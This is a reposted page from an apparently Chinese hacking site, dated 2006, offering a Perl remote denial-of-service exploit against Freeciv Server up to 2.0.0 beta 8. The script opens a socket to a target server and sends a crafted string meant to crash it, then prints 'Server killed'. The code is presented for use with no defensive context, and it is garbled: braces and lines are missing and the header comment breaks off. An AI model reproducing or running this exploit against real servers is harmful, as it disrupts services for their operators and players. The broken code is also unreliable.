| Freeciv Server 2.0.0 beta 8 Remote Denial of Service Exploit | 热 |
| Freeciv Server 2.0.0 beta 8 Remote Denial of Service Exploit | ||
| 作者:YesHack.… 文章来源:YesHack.Com 更新时间:2006-4-18 8:29:00 【字体:小 大】 | ||
#!/usr/bin/perl # Freeciv Server <= 2.0.0beta8 DoS exploit (windows&linux releases) # There is a vulnerability in the handling of incoming data. If the request use IO::Socket; if (@ARGV < 1) $server = $ARGV[0]; $socket = IO::Socket::INET->new( print "[-] Connected\n\n"; print "[-] Creating string\n"; $string="@+2.0 conn_ping_info username_info-beta8"; print "[-] Sending string\n\n"; print $socket "$string"; print "[>] Attack successful - Server killed\n"; close($socket); |
||
|
||
| 文章录入:YesHack.Com 责任编辑:YesHack.Com | ||
您现在的位置: